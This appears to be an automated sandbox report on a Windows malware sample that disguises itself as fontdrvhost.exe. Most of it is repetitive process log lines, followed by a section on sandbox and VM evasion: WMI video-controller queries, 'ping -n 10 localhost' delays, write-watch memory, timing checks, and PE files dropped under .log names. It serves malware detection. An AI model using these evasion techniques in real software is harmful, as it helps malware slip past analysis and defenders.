Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Memory allocated: 1280000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Memory allocated: 1B0B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: C00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1A840000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1190000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1B110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1670000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1B180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1AEF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: E10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1AAB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1ACA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1AB90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1800000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1B4D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1ADF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: A20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1A750000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1A620000 memory reserve | memory write watch
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD3600 rdtsc 0_2_00007FFD9BBD3600
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IsWIxvZJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fzXEwQRC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\auteTnDC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zTojkKNX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AaPSReOe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uztLDTCs.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hezDLgou.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CkrRJHNx.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tIxJOpqh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bYjfzcZg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xOrrZDRn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yEAAOeyR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WvXEaKPX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ntFcgnCN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\feqUKmVF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bAJNFhyM.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WAZwZzli.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BxnIYuRz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EQFIYaOX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fLnmpTPV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RMfXVWDe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nJodFojJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EOpBrqDR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UbSwNisy.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aYVnMXzh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RnzHiPIs.log Jump to dropped file
